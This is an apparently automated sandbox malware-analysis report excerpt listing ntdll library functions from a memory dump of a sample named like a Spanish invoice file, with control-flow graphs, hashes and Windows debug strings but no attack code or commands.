                                  • Instruction ID: eccf4ec13e6561bca441c389a59465ce28b76579d87450b8566e2a08bf129588
                                  • Opcode Fuzzy Hash: 373caa334101c4a6c65a51a7bd8584825ce4ba13f8e2a4fdfd424d8c72668eed
                                  • Instruction Fuzzy Hash: 5490023124240402D14671585508746015957D0251F99D013E1428514E86558B5ABA61
                                  Function 32522C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: d6b095ffc2505a062e12a0821b016ca4459385dc2147b0a7676ccd3be70fcbdb
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Function 32522890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1127 32522890-325228b3 1128 3255a4bc-3255a4c0 1127->1128 1129 325228b9-325228cc 1127->1129 1128->1129 1130 3255a4c6-3255a4ca 1128->1130 1131 325228ce-325228d7 1129->1131 1132 325228dd-325228df 1129->1132 1130->1129 1133 3255a4d0-3255a4d4 1130->1133 1131->1132 1135 3255a57e-3255a585 1131->1135 1134 325228e1-325228e5 1132->1134 1133->1129 1136 3255a4da-3255a4de 1133->1136 1137 325228eb-325228fa 1134->1137 1138 32522988-3252298e 1134->1138 1135->1132 1136->1129 1139 3255a4e4-3255a4eb 1136->1139 1140 32522900-32522905 1137->1140 1141 3255a58a-3255a58d 1137->1141 1142 32522908-3252290c 1138->1142 1143 3255a564-3255a56c 1139->1143 1144 3255a4ed-3255a4f4 1139->1144 1140->1142 1141->1142 1142->1134 1145 3252290e-3252291b 1142->1145 1143->1129 1146 3255a572-3255a576 1143->1146 1147 3255a4f6-3255a4fe 1144->1147 1148 3255a50b 1144->1148 1149 32522921 1145->1149 1150 3255a592-3255a599 1145->1150 1146->1129 1151 3255a57c call 32530050 1146->1151 1147->1129 1152 3255a504-3255a509 1147->1152 1153 3255a510-3255a536 call 32530050 1148->1153 1154 32522924-32522926 1149->1154 1158 3255a5a1-3255a5c9 call 32530050 1150->1158 1169 3255a55d-3255a55f 1151->1169 1152->1153 1153->1169 1155 32522993-32522995 1154->1155 1156 32522928-3252292a 1154->1156 1155->1156 1164 32522997-325229b1 call 32530050 1155->1164 1160 32522946-32522966 call 32530050 1156->1160 1161 3252292c-3252292e 1156->1161 1176 32522969-32522974 1160->1176 1161->1160 1166 32522930-32522944 call 32530050 1161->1166 1164->1176 1166->1160 1172 32522981-32522985 1169->1172 1176->1154 1178 32522976-32522979 1176->1178 1178->1158 1179 3252297f 1178->1179 1179->1172
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: d80134792dfb5e4892c596ea509428e118a4dd3af04ec4b7b1e51d14c8469b38
                                  • Instruction ID: c50a918128c767e13321e1902b7853f5b12a2db0fff97560fa129198418de2c2
                                  • Opcode Fuzzy Hash: d80134792dfb5e4892c596ea509428e118a4dd3af04ec4b7b1e51d14c8469b38
                                  • Instruction Fuzzy Hash: 6D510DBAA0031ABFDB14DB58C990A7EFBB8BB483417508169E495D76C1D634DF40CBE0
                                  Function 32592410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1180 32592410-32592433 1181 32592439-3259243d 1180->1181 1182 325924ec-325924ff 1180->1182 1181->1182 1183 32592443-32592447 1181->1183 1184 32592501-3259250a 1182->1184 1185 32592513-32592515 1182->1185 1183->1182 1186 3259244d-32592451 1183->1186 1184->1185 1187 3259250c 1184->1187 1188 32592517-3259251b 1185->1188 1186->1182 1189 32592457-3259245b 1186->1189 1187->1185 1190 32592538-3259253e 1188->1190 1191 3259251d-3259252c 1188->1191 1189->1182 1193 32592461-32592468 1189->1193 1192 32592543-32592547 1190->1192 1194 3259252e-32592536 1191->1194 1195 32592540 1191->1195 1192->1188 1196 32592549-32592556 1192->1196 1197 3259246a-32592471 1193->1197 1198 325924b6-325924be 1193->1198 1194->1192 1195->1192 1199 32592558-32592562 1196->1199 1200 32592564 1196->1200 1202 32592473-3259247b 1197->1202 1203 32592484 1197->1203 1198->1182 1201 325924c0-325924c4 1198->1201 1204 32592567-32592569 1199->1204 1200->1204 1201->1182 1205 325924c6-325924ea call 32530510 1201->1205 1202->1182 1206 3259247d-32592482 1202->1206 1207 32592489-325924ab call 32530510 1203->1207 1209 3259256b-3259256d 1204->1209 1210 3259258d-3259258f 1204->1210 1218 325924ae-325924b1 1205->1218 1206->1207 1207->1218 1209->1210 1213 3259256f-3259258b call 32530510 1209->1213 1215 325925ae-325925d0 call 32530510 1210->1215 1216 32592591-32592593 1210->1216 1225 325925d3-325925df 1213->1225 1215->1225 1216->1215 1220 32592595-325925ab call 32530510 1216->1220 1222 32592615-32592619 1218->1222 1220->1215 1225->1204 1227 325925e1-325925e4 1225->1227 1228 32592613 1227->1228 1229 325925e6-32592610 call 32530510 1227->1229 1228->1222 1229->1228
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 1da469800208aa25a722d9b0f07815b5ce9cd63e887859928f166a96c1364f54
                                  • Instruction ID: 1233cc029c4f9659bdfac8d8109b53bf4ba15679653e69201308d06de7ca628f
                                  • Opcode Fuzzy Hash: 1da469800208aa25a722d9b0f07815b5ce9cd63e887859928f166a96c1364f54
                                  • Instruction Fuzzy Hash: 07510775A00745AFEB64CF9DC9A0ABFBBF8EB44240B408859E4D9C7641EA74DF00CB60
                                  Function 325BA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1429 325ba670-325ba6e9 call 324f2410 * 2 RtlDebugPrintTimes 1435 325ba89f-325ba8c4 call 324f25b0 * 2 call 32524c30 1429->1435 1436 325ba6ef-325ba6fa 1429->1436 1438 325ba6fc-325ba709 1436->1438 1439 325ba724 1436->1439 1441 325ba70b-325ba70d 1438->1441 1442 325ba70f-325ba715 1438->1442 1443 325ba728-325ba734 1439->1443 1441->1442 1445 325ba71b-325ba722 1442->1445 1446 325ba7f3-325ba7f5 1442->1446 1447 325ba741-325ba743 1443->1447 1445->1443 1448 325ba81f-325ba821 1446->1448 1449 325ba736-325ba73c 1447->1449 1450 325ba745-325ba747 1447->1450 1452 325ba827-325ba834 1448->1452 1453 325ba755-325ba77d RtlDebugPrintTimes 1448->1453 1455 325ba73e 1449->1455 1456 325ba74c-325ba750 1449->1456 1450->1448 1458 325ba85a-325ba866 1452->1458 1459 325ba836-325ba843 1452->1459 1453->1435 1467 325ba783-325ba7a0 RtlDebugPrintTimes 1453->1467 1455->1447 1457 325ba86c-325ba86e 1456->1457 1457->1448 1464 325ba87b-325ba87d 1458->1464 1462 325ba84b-325ba851 1459->1462 1463 325ba845-325ba849 1459->1463 1468 325ba96b-325ba96d 1462->1468 1469 325ba857 1462->1469 1463->1462 1465 325ba87f-325ba881 1464->1465 1466 325ba870-325ba876 1464->1466 1470 325ba883-325ba889 1465->1470 1471 325ba878 1466->1471 1472 325ba8c7-325ba8cb 1466->1472 1467->1435 1477 325ba7a6-325ba7cc RtlDebugPrintTimes 1467->1477 1468->1470 1469->1458 1473 325ba88b-325ba89d RtlDebugPrintTimes 1470->1473 1474 325ba8d0-325ba8f4 RtlDebugPrintTimes 1470->1474 1471->1464 1476 325ba99f-325ba9a1 1472->1476 1473->1435 1474->1435 1480 325ba8f6-325ba913 RtlDebugPrintTimes 1474->1480 1477->1435 1482 325ba7d2-325ba7d4 1477->1482 1480->1435 1487 325ba915-325ba944 RtlDebugPrintTimes 1480->1487 1484 325ba7f7-325ba80a 1482->1484 1485 325ba7d6-325ba7e3 1482->1485 1486 325ba817-325ba819 1484->1486 1488 325ba7eb-325ba7f1 1485->1488 1489 325ba7e5-325ba7e9 1485->1489 1490 325ba81b-325ba81d 1486->1490 1491 325ba80c-325ba812 1486->1491 1487->1435 1495 325ba94a-325ba94c 1487->1495 1488->1446 1488->1484 1489->1488 1490->1448 1492 325ba868-325ba86a 1491->1492 1493 325ba814 1491->1493 1492->1457 1493->1486 1496 325ba94e-325ba95b 1495->1496 1497 325ba972-325ba985 1495->1497 1498 325ba95d-325ba961 1496->1498 1499 325ba963-325ba969 1496->1499 1500 325ba992-325ba994 1497->1500 1498->1499 1499->1468 1499->1497 1501 325ba987-325ba98d 1500->1501 1502 325ba996 1500->1502 1503 325ba99b-325ba99d 1501->1503 1504 325ba98f 1501->1504 1502->1465 1503->1476 1504->1500
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: HEAP:
                                  • API String ID: 3446177414-2466845122
                                  • Opcode ID: 8c017684f791adb509ae266acbccc134ac7c1a17b6aee84f95a873736d87dea4
                                  • Instruction ID: da99b4e9906c892a1c20617c40ae66832d86acd404f951d90935fc0ca6079673
                                  • Opcode Fuzzy Hash: 8c017684f791adb509ae266acbccc134ac7c1a17b6aee84f95a873736d87dea4
                                  • Instruction Fuzzy Hash: 18A18C75A043128FDB09CE28C890A1ABBE5FF88364F15496DF945DB350EB70EE46CB91
                                  Function 32517630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1505 32517630-32517651 1506 32517653-3251766f call 324ee660 1505->1506 1507 3251768b-32517699 call 32524c30 1505->1507 1512 32517675-32517682 1506->1512 1513 32554638 1506->1513 1514 32517684 1512->1514 1515 3251769a-325176a9 call 32517818 1512->1515 1517 3255463f-32554645 1513->1517 1514->1507 1521 32517701-3251770a 1515->1521 1522 325176ab-325176c1 call 325177cd 1515->1522 1519 325176c7-325176d0 call 32517728 1517->1519 1520 3255464b-325546b8 call 3256f290 call 32529020 RtlDebugPrintTimes BaseQueryModuleData 1517->1520 1519->1521 1530 325176d2 1519->1530 1520->1519 1540 325546be-325546c6 1520->1540 1525 325176d8-325176e1 1521->1525 1522->1517 1522->1519 1532 325176e3-325176f2 call 3251771b 1525->1532 1533 3251770c-3251770e 1525->1533 1530->1525 1534 325176f4-325176f6 1532->1534 1533->1534 1538 32517710-32517719 1534->1538 1539 325176f8-325176fa 1534->1539 1538->1539 1539->1514 1542 325176fc 1539->1542 1540->1519 1541 325546cc-325546d3 1540->1541 1541->1519 1543 325546d9-325546e4 1541->1543 1544 325547be-325547d0 call 32522c50 1542->1544 1545 325547b9 call 32524d48 1543->1545 1546 325546ea-32554723 call 3256f290 call 3252aaa0 1543->1546 1544->1514 1545->1544 1554 32554725-32554736 call 3256f290 1546->1554 1555 3255473b-3255476b call 3256f290 1546->1555 1554->1521 1555->1519 1560 32554771-3255477f call 3252a770 1555->1560 1563 32554786-325547a3 call 3256f290 call 3255cf9e 1560->1563 1564 32554781-32554783 1560->1564 1563->1519 1569 325547a9-325547b2 1563->1569 1564->1563 1569->1560 1570 325547b4 1569->1570 1570->1519
                                  Strings
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32554742
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32554655
                                  • ExecuteOptions, xrefs: 325546A0
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 325546FC
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 32554787
                                  • Execute=1, xrefs: 32554713
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32554725
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: b5a8542397e1fdc84d471fd061d5b9d9c4dceaddf9422073b95b85180e8b21a3
                                  • Instruction ID: f3cd50072f883d1e07f7b1a0bf0fa70fc144bf248fd799e80da5987c6082a94a
                                  • Opcode Fuzzy Hash: b5a8542397e1fdc84d471fd061d5b9d9c4dceaddf9422073b95b85180e8b21a3
                                  • Instruction Fuzzy Hash: 3F510575A00319BBFF109EA9DC95FAE77B8AF44345F9004A9E505AB1C0EB70AB45CF50
                                  Function 324FA250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325479FA
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 325479D0, 325479F5
                                  • SsHd, xrefs: 324FA3E4
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325479D5
                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32547AE6
                                  • Actx , xrefs: 32547A0C, 32547A73
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                  • API String ID: 0-1988757188
                                  • Opcode ID: 5dc9ffbbacf3524a8f78c1edadc729ef2ef74ca58a6918fa822ee60a46db02fa
                                  • Instruction ID: 4f47f1dc22d9bfe622660885045ab9ca558715f101fa73b1cc3ecf24ade3b3e7
                                  • Opcode Fuzzy Hash: 5dc9ffbbacf3524a8f78c1edadc729ef2ef74ca58a6918fa822ee60a46db02fa
                                  • Instruction Fuzzy Hash: E9E1C174604352AFE714CE25C884B5AB7E1AFC4B58F504A2EEC95CB390DF32DA85CB91
                                  Function 3255FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                  • API String ID: 3446177414-4227709934
                                  • Opcode ID: d91876eeef8e8ff8c8445082963cc38fb000e208b8654bc77eefd9ea4c4e23a2
                                  • Instruction ID: f651a2156da0423dbd7e831563c0df0f17b6582deb731a4441ee70c8feee0883
                                  • Opcode Fuzzy Hash: d91876eeef8e8ff8c8445082963cc38fb000e208b8654bc77eefd9ea4c4e23a2
                                  • Instruction Fuzzy Hash: 1B416CB9A01209ABDB01DF99C980ADEBBB5BF49314F20015AED05E7351DB719A51CBA0
                                  Function 3258FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                  • API String ID: 3446177414-3492000579
                                  • Opcode ID: 881e2f060d5e99e3b46bc3993af7174ef00a5e437bd497e391f6d43fce130f18
                                  • Instruction ID: 954255f8af51d74c908e99da339fbb3ccfa2389798b74d7203ca4ac1c62395d5
                                  • Opcode Fuzzy Hash: 881e2f060d5e99e3b46bc3993af7174ef00a5e437bd497e391f6d43fce130f18
                                  • Instruction Fuzzy Hash: 0A71CD36A01284DFDB05CFA8D4506ADFBF2FF8A314F848499E445EB252CBB59A81CF50
                                  Function 324D65B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 32539AC5, 32539B06
                                  • LdrpLoadShimEngine, xrefs: 32539ABB, 32539AFC
                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32539AB4
                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32539AF6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-3589223738
                                  • Opcode ID: 8c48ac997cd39d5227fbe8778d6a9cc4b56629f90d16bed4d0cff23f7f40b4c9
                                  • Instruction ID: 92b6091c5148de257bb46dc8a110bc3fc4a3df3acae395308b842a9fbb217cb6
                                  • Opcode Fuzzy Hash: 8c48ac997cd39d5227fbe8778d6a9cc4b56629f90d16bed4d0cff23f7f40b4c9
                                  • Instruction Fuzzy Hash: 0E51F575B413589FDB08EFA8C854B9D77B2AB84304F440559F541FB296CBB09E81CB90
                                  Function 32509803 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: @3]2$LdrpUnloadNode$Unmapping DLL "%wZ"$df]2@3]2@3]2$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-2199215269
                                  • Opcode ID: ccfe33f67f13942fdc4c412ccd2e3244d637cd9fa139af4e82864f77ce2e5e59
                                  • Instruction ID: f2a30507c33089e00bbf203638738998d33f3a16430b8d06d9f7585ffd15d125
                                  • Opcode Fuzzy Hash: ccfe33f67f13942fdc4c412ccd2e3244d637cd9fa139af4e82864f77ce2e5e59
                                  • Instruction Fuzzy Hash: 98512675605302AFE714DF38CC84B19BB90BFC4B24F448A6DE89597288DB70AB45CF95
                                  Function 3258F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3258F263
                                  • Entry Heap Size , xrefs: 3258F26D
                                  • ---------------------------------------, xrefs: 3258F279
                                  • HEAP: , xrefs: 3258F15D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                  • API String ID: 3446177414-1102453626
                                  • Opcode ID: 3c9618128352ed0f4f2eb31feef9251e2cbf86acb719fb4a5b2da63644665b3c
                                  • Instruction ID: 507a0cd4657c6032799aed3923a980e458c40a67aa6089b1062eb11ada342c20
                                  • Opcode Fuzzy Hash: 3c9618128352ed0f4f2eb31feef9251e2cbf86acb719fb4a5b2da63644665b3c
                                  • Instruction Fuzzy Hash: 1441AE39B41216DFC704CF18C880A59BBF5EF4935575584AAE809EB311DBB1EE42CB90
                                  Function 3250DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                  • API String ID: 3446177414-1222099010
                                  • Opcode ID: 1578f5873bd7599fdc943bbd9e3ec46e0bc7963fb63f8897bf6bebd16b3ac65c
                                  • Instruction ID: f200e637fe0b15a029315a7394ccc8750d9f24fd712a151154da10191ab07996
                                  • Opcode Fuzzy Hash: 1578f5873bd7599fdc943bbd9e3ec46e0bc7963fb63f8897bf6bebd16b3ac65c
                                  • Instruction Fuzzy Hash: 16312535106780DFF716CB28CD15F9ABBE4EF01750F008489E84697B52CFB8AA81CE21
                                  Function 325B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction ID: fd22b2a2a553bce52438e2449cf2cea6e0cee7aee3633b853911d3002104ffdc
                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction Fuzzy Hash: EB0214B5509341AFDB04CF18C590A6FBBE5EFC8704F80892DF9984B2A4DB71EA45CB42
                                  Function 3252B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
